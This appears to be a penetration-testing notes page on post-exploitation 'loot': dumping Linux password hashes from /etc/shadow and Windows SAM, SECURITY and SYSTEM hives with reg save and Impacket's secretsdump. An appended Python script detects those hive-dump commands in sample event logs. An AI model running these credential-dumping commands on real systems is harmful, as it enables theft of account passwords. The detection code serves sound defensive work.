Loot
Once we are root or NT AUTHORITY\SYSTEM it's time to collect some loot. 🤑🤑🤑
Linux
Dump users and passwords
Collect files on target
/etc/passwd
/etc/shadow
Then unshadow and crack them.
Windows
Dump SAM
Collect files on target
reg save hklm\sam .\sam
reg save hklm\security .\security
reg save hklm\system .\system
Then crack them using Impacket's secretsdump
secretsdump.py -sam sam -security security -system system LOCAL
Dump NTDS (DC)
By default, the Ntds.dit file is located at %SystemRoot%\NTDS\Ntds.dit on a domain controller.
TODO (see /13-misc/impacket.md)
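On the detection side, the three `reg save` commands in the Dump SAM section leave a recognizable process-creation trail. This added example (not part of the original page) scans command-line events for it. The event tuples are constructed sample data; the field layout, function names and 5-minute window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches `reg save` / `reg.exe save` of the whole SAM, SECURITY or SYSTEM hive
# (short or long root key, case-insensitive); subkey saves do not match.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:hklm|hkey_local_machine)\\(sam|security|system)"?(?:\s|$)',
    re.IGNORECASE,
)

# Constructed sample events: (timestamp, host, user, command line).
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:01", "WS01", "alice", r"reg query hklm\software\microsoft"),
    ("2024-01-10T09:14:30", "WS02", "svc_backup", r"reg save hklm\sam .\sam"),
    ("2024-01-10T09:14:41", "WS02", "svc_backup", r"REG.EXE SAVE HKLM\SECURITY .\security"),
    ("2024-01-10T09:14:55", "WS02", "svc_backup", r"reg save hklm\system .\system"),
    ("2024-01-10T11:02:00", "WS03", "bob", r"reg save hklm\system C:\backup\system.hiv"),
    ("2024-01-10T11:05:00", "WS03", "bob", r"reg save hklm\software\vendor C:\backup\v.hiv"),
]

def saved_hive(command_line):
    """Return the sensitive hive a command line saves ('sam', ...), or None."""
    m = HIVE_SAVE.search(command_line)
    return m.group(1).lower() if m else None

def detect_hive_dumps(events, window=timedelta(minutes=5)):
    """Alert once per host that saves SAM and SYSTEM within `window`."""
    per_host = defaultdict(list)
    for ts, host, user, cmd in events:
        hive = saved_hive(cmd)
        if hive:
            per_host[host].append((datetime.fromisoformat(ts), hive, user))
    alerts = []
    for host, hits in per_host.items():
        hits.sort()
        for start, _, _ in hits:
            in_window = [h for h in hits if start <= h[0] <= start + window]
            hives = {h[1] for h in in_window}
            if {"sam", "system"} <= hives:  # SAM is only usable with SYSTEM
                alerts.append({"host": host, "hives": sorted(hives),
                               "users": sorted({h[2] for h in in_window})})
                break
    return alerts
```

In the sample data only WS02 alerts; a lone SYSTEM save (WS03) is left for lower-severity triage.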